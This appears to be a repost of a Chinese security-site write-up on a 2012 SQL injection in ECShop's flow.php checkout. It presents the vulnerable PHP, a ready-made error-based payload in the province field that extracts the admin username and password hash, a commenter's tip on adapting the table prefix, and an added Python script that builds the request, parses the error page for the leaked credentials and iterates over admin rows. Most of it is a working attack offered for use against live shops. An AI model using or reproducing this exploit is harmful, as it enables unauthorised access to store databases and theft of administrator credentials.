Original writeup (credit to the original author): ECShop全版本SQL注入0day (ECShop SQL injection 0day affecting all versions)
http://www.yunsec.net/a/security/bugs/script/2012/1230/12181.html
The injection is in flow.php, in the step=consignee branch:
elseif ($_REQUEST['step'] == 'consignee')
{
    ....
    $consignee = array(
        'address_id'    => empty($_POST['address_id']) ? 0 : intval($_POST['address_id']),
        'consignee'     => empty($_POST['consignee']) ? '' : trim($_POST['consignee']),
        // the region ids and the free-text fields below are stored exactly as posted
        'country'       => empty($_POST['country']) ? '' : $_POST['country'],
        'province'      => empty($_POST['province']) ? '' : $_POST['province'],
        'city'          => empty($_POST['city']) ? '' : $_POST['city'],
        'district'      => empty($_POST['district']) ? '' : $_POST['district'],
        'email'         => empty($_POST['email']) ? '' : $_POST['email'],
        'address'       => empty($_POST['address']) ? '' : $_POST['address'],
        'zipcode'       => empty($_POST['zipcode']) ? '' : make_semiangle(trim($_POST['zipcode'])),
        'tel'           => empty($_POST['tel']) ? '' : make_semiangle(trim($_POST['tel'])),
        'mobile'        => empty($_POST['mobile']) ? '' : make_semiangle(trim($_POST['mobile'])),
        'sign_building' => empty($_POST['sign_building']) ? '' : $_POST['sign_building'],
        'best_time'     => empty($_POST['best_time']) ? '' : $_POST['best_time'],
    );
    if ($_SESSION['user_id'] > 0)
    {
        include_once(ROOT_PATH . 'includes/lib_transaction.php');
        $consignee['user_id'] = $_SESSION['user_id'];
        save_consignee($consignee, true);
    }
    // the array is saved for the user and kept in the session for the checkout step
    $_SESSION['flow_consignee'] = stripslashes_deep($consignee);
    ecs_header("Location: flow.php?step=checkout\n");
    exit;
...
The POST values are used without any validation: country, province, city, district, email, address, sign_building and best_time go into $consignee exactly as submitted. Only address_id is cast with intval(); trim() and make_semiangle() on the other fields normalise whitespace and character width and do nothing about quoting. The region fields are numeric ids but are accepted as arbitrary strings, saved through save_consignee() and carried in the session into the checkout step, which is where the injected province value reaches a query.
The original author describes the vulnerability as follows:
Add any product to the cart. On the page where you fill in the delivery address there is a region selector; pick any region. The POST data is:
country=1&province=11&city=152&district=1294&consignee=1111111&email=111111@qq.com&address=1111111&zipcode=&tel=1111111&mobile=&sign_building=&best_time=&Submit=配送至这个地址&step=consignee&act=checkout&address_id=
Modifying the province variable allows error-based injection (the result is echoed back in the MySQL error).
So here is a ready-made exploit: log in to the target site (register an account first), add any product to the cart, proceed to checkout, then save the following as an .html file and submit it to inject.
The exploit page, titled "ECSHOP通版本注入漏洞 2012圣诞版简单EXP [ Silic Group Hacker Army ]" and credited "// 云安全 www.yunsec.net", survives here only as its rendered text: a target URL field labelled 地址: (Address:) and the value to send as province:
11'and(select 1 from(select count(*),concat(floor(rand(0)*2),0x3a,(select(select(SELECT concat(user_name,0x3a,password)FROM ecs_admin_user limit 0,1))from information_schema.tables limit 0,1))x from information_schema.tables group by x)a) and 1=1#
The leading 11' closes the string literal the province value lands in, the trailing # comments out the rest of the original query, and the floor(rand(0)*2) ... GROUP BY x construction makes MySQL abort with a duplicate-key error whose message contains the selected user_name:password pair from ecs_admin_user, so the admin credentials are read straight out of the error page.
The result looks like this: [screenshot from the original not reproduced]
*Note: the original author's description used province=11')xxxx.... In my testing, some versions do not need the closing parenthesis. This statement is limited to MySQL 5.x; it does not work on 4.x.
ropin:
A follow-up: if it does not work, look at the error message:
MySQL server error report:Array ( [0] => Array ( [message] => MySQL Query Error ) [1] => Array ( [sql] => SELECT region_id, region_name FROM `asky880`.`jf_region` WHERE r...
See that? This site changed the database's default name, so the exp has to be changed accordingly: replace ecs_admin_user with jf_admin_user.
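The following is an added example, not code from the original post or from the exploit page it describes. It puts the two practical steps above into one script: building the step=consignee POST body with the province payload from this page (parameterised by the admin table prefix and the 11' / 11') closing variants the note discusses), and reading an ECShop "MySQL server error report" of the kind ropin quotes to recover the table prefix and the leaked user_name:password. The field names come from the POST body shown above; the sample response is constructed here, modelled on ropin's quote, and its [error]/[errno] entries and the exact MySQL 1062 wording ("Duplicate entry '...' for key '...'") are assumptions about the full report rather than text taken from this page.

```python
"""Build the ECShop flow.php province payload and parse the error report it triggers."""
import re
from urllib.parse import urlencode

# Field set copied from the POST body shown in the writeup (step=consignee).
BASE_FIELDS = {
    "country": "1", "province": "11", "city": "152", "district": "1294",
    "consignee": "1111111", "email": "111111@qq.com", "address": "1111111",
    "zipcode": "", "tel": "1111111", "mobile": "", "sign_building": "",
    "best_time": "", "Submit": "配送至这个地址", "step": "consignee",
    "act": "checkout", "address_id": "",
}


def build_payload(prefix="ecs_", close_paren=False, row=0):
    """Error-based probe from the page, parameterised by table prefix and row.

    11' closes the string literal the province value lands in (11') when the
    target wraps it in parentheses, as the note on the page mentions); the
    floor(rand(0)*2) / GROUP BY construction makes MySQL raise a duplicate-key
    error carrying the selected user_name:password; the trailing # comments
    out the remainder of the original query.
    """
    inner = (f"(SELECT concat(user_name,0x3a,password)"
             f"FROM {prefix}admin_user limit {row},1)")
    closer = "')" if close_paren else "'"
    return (f"11{closer}and(select 1 from(select count(*),"
            f"concat(floor(rand(0)*2),0x3a,(select(select{inner})"
            f"from information_schema.tables limit 0,1))x "
            f"from information_schema.tables group by x)a) and 1=1#")


def build_post_body(prefix="ecs_", close_paren=False, row=0):
    """Full application/x-www-form-urlencoded body for POST /flow.php."""
    fields = dict(BASE_FIELDS, province=build_payload(prefix, close_paren, row))
    return urlencode(fields)


# Table the error report exposes: FROM `db`.`<prefix>region` (prefix may be empty).
_PREFIX_RE = re.compile(r"FROM\s+(?:`[^`]+`\.)?`(\w*?)region`", re.IGNORECASE)
# MySQL error 1062 text produced by the duplicate group key (assumed wording).
_LEAK_RE = re.compile(r"Duplicate entry '[01]:([^:']+):([^']*)' for key '[^']*'")


def table_prefix(error_report):
    """Return the table prefix the target uses, or None if no region query is shown."""
    m = _PREFIX_RE.search(error_report)
    return m.group(1) if m else None


def leaked_admin(error_report):
    """Return (user_name, password) from a duplicate-key error, or None."""
    m = _LEAK_RE.search(error_report)
    return (m.group(1), m.group(2)) if m else None


def retarget(error_report, close_paren=False):
    """Rebuild the POST body with the prefix the target's own error revealed."""
    prefix = table_prefix(error_report)
    return None if prefix is None else build_post_body(prefix, close_paren)


# Constructed sample modelled on the print_r-style report quoted by ropin; the
# [error]/[errno] entries are an assumption about what the full report contains.
SAMPLE_REPORT = (
    "MySQL server error report:Array ( [0] => Array ( [message] => MySQL Query Error ) "
    "[1] => Array ( [sql] => SELECT region_id, region_name FROM `asky880`.`jf_region` "
    "WHERE r... ) [2] => Array ( [error] => Duplicate entry "
    "'1:admin:21232f297a57a5a743894a0e4a801fc3' for key 'group_key' ) "
    "[3] => Array ( [errno] => 1062 ) )"
)

if __name__ == "__main__":
    print("default body:", build_post_body()[:80], "...")
    print("prefix seen in error:", table_prefix(SAMPLE_REPORT))
    print("leaked admin row:", leaked_admin(SAMPLE_REPORT))
    print("retargeted body:", retarget(SAMPLE_REPORT)[:80], "...")
```

Run the first body against the target, feed the error page to table_prefix() and, if the prefix is not ecs_, send retarget() instead; raise row to walk through further admin_user rows once the first one comes back in leaked_admin().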
Source: 中国云安网 (www.yunsec.net)
http://www.yunsec.net/a/security/web/jbst/2013/0111/12225.html